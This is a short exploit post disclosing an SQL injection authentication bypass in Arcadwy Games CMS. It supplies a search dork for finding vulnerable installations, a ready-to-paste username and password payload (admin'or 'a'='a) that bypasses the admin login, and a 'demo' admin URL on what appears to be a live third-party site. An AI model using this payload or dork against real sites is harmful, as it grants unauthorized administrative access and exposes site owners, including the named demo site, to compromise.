Arcadwy Games CMS suffers from a remote SQL injection vulnerability that allows for an authentication bypass.
b48ba1562c34dd99ce653f2a7ebe282362308c592645d7b6cf1f55e2ef060d4b
#---------------------------------------------------------------------------------------------
# scriptname: Arcadwy Games Cms
#
# Arcadwy Games Cms (Auth Bypass) SQL Injection Vulnerability
#
# Author: PLATEN
#
# contact: PLATEN.Secure[at]Gmail.com
#
# web: Www.ata-turk.tk & www.deltahacking.net
#
# big tnx: b3hz4d
#---------------------------------------------------------------------------------------------
dork: "powered by Arcadwy Games Cms"
----------------------------------------------------------------------------------------------
Exploit:
username: admin'or 'a'='a
password: admin'or 'a'='a
http://127.1.1.7/admin/admin.php
demo: http://clipgamers.com/admin/admin.php
#----------------------------------------------------------------------------------------------